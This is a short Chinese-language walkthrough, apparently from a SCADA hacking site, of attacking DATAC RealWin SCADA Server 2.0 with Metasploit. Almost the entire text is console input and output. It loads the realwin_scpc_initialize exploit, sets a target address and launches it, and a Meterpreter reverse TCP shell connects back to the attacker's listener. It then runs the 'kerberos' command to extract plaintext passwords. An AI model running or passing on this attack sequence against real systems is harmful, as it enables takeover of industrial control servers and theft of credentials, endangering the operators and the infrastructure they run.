使用Metasploit对DATAC RealWin SCADA Server 2.0进行渗透

---

前言

使用Metasploit对DATAC RealWin SCADA Server 2.0进行渗透

---

攻击

msf6 > use exploit/windows/scada/realwin_scpc_initialize
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/realwin_scpc_initialize) > options

Module options (exploit/windows/scada/realwin_scpc_initialize):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   912              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf6 exploit(windows/scada/realwin_scpc_initialize) > set rhosts 192.168.1.106
rhosts => 192.168.1.106

msf6 exploit(windows/scada/realwin_scpc_initialize) > exploit

[*] Started reverse TCP handler on 192.168.1.113:4444 
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1622) at 2021-05-10 21:08:49 +0800
[*] Sending stage (175174 bytes) to 192.168.1.115

获得meterpreter权限后使用kerberos获取明文密码

meterpreter > kerberos

最大的SCADA黑客和安全技术网站
大量SCADA渗透模块信息